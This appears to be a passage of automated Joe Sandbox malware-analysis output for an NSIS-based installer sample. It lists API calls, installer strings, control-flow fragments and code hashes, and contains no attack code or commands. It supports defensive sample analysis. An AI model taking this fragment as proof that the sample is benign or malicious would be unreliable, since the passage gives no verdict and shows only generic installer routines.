                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                                          • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                                                          • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                                                          • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                                                          • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                                                          • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                                                          • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                                                          • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                                          • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                                          • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                                          • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                                                          • API String ID: 2872004960-3619442763

                                                                                                                                                                                                                                                                                                          Control-flow Graph

APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
• ShowWindow.USER32(?), ref: 004054FE
• DestroyWindow.USER32 ref: 00405512
• SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
• GetDlgItem.USER32(?,?), ref: 0040554F
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
• IsWindowEnabled.USER32(00000000), ref: 0040556A
• GetDlgItem.USER32(?,00000001), ref: 00405619
• GetDlgItem.USER32(?,00000002), ref: 00405623
• SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
• GetDlgItem.USER32(?,00000003), ref: 00405734
• ShowWindow.USER32(00000000,?), ref: 00405756
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
• EnableWindow.USER32(?,?), ref: 00405783
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
• EnableMenuItem.USER32(00000000), ref: 004057A0
• SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
• lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
• SetWindowTextW.USER32(?,00451D98), ref: 00405808
• ShowWindow.USER32(?,0000000A), ref: 0040593C
Memory Dump Source
• Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
Similarity
• API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
• String ID:
• API String ID: 3282139019-0
• Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
• Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
• Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
• Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Control-flow Graph
APIs
  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
• lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
• lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
• lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
• GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
• LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
• RegisterClassW.USER32(00476A40), ref: 00405B36
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
• CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
  • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
• ShowWindow.USER32(00000005,00000000), ref: 00405BBD
• LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
• LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
• GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
• GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
• RegisterClassW.USER32(00476A40), ref: 00405BFF
• DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
Similarity
• API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
• String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
• API String ID: 608394941-2746725676
• Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
• Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
• Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,SurplusBallotRhAloneComplexity,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,SurplusBallotRhAloneComplexity,SurplusBallotRhAloneComplexity,00000000,00000000,SurplusBallotRhAloneComplexity,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426176,756F23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426176,756F23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426176,756F23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$SurplusBallotRhAloneComplexity
                                                                                                                                                                                                                                                                                                          • API String ID: 4286501637-3349193586
                                                                                                                                                                                                                                                                                                          • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                                          • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00426176,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                                          • String ID: (]C$... %d%%$pAB$vaB$y!B
                                                                                                                                                                                                                                                                                                          • API String ID: 651206458-3902754529
                                                                                                                                                                                                                                                                                                          • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                                          • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                                                          • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                                                          • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                                                          • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                                                          • API String ID: 4283519449-527102705

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00445D80,00426176,756F23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(004034E5,00445D80,00426176,756F23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426176,756F23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,756F23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2740478559-0

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00794950), ref: 00402387
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
Similarity
• API ID: FreeGloballstrcpyn
• String ID: Exch: stack < %d elements$PIy$Pop: stack empty$SurplusBallotRhAloneComplexity
• API String ID: 1459762280-1459020178
• Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
• Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
• Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
• Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

Control-flow Graph
control_flow_graph 764 402713-40273b call 406035 * 2 769 402746-402749 764->769 770 40273d-402743 call 40145c 764->770 772 402755-402758 769->772 773 40274b-402752 call 40145c 769->773 770->769 776 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 772->776 777 40275a-402761 call 40145c 772->777 773->772 777->776
APIs
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
• WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
Strings
• SurplusBallotRhAloneComplexity, xrefs: 00402770
• <RM>, xrefs: 00402713
• WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
Memory Dump Source
• Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
Similarity
• API ID: PrivateProfileStringWritelstrcpyn
• String ID: <RM>$SurplusBallotRhAloneComplexity$WriteINIStr: wrote [%s] %s=%s in %s
• API String ID: 247603264-3740103072
• Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
• Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
• Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
• Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Control-flow Graph
control_flow_graph 785 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 796 402223-4030f2 call 4062cf 785->796 797 40220d-40221b call 4062cf 785->797 797->796
APIs
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426176,756F23A0,00000000), ref: 00404FD6
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426176,756F23A0,00000000), ref: 00404FE6
  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426176,756F23A0,00000000), ref: 00404FF9
  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
• ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
Strings
• ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
• ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
Memory Dump Source
• Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
Similarity
• API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
• String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
• API String ID: 3156913733-2180253247
• Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
• Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
• Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
• Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Control-flow Graph
control_flow_graph 805 405eab-405eb7 806 405eb8-405eec GetTickCount GetTempFileNameW 805->806 807 405efb-405efd 806->807 808 405eee-405ef0 806->808 810 405ef5-405ef8 807->810 808->806 809 405ef2 808->809 809->810
APIs
• GetTickCount.KERNEL32 ref: 00405EC9
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CountFileNameTempTick
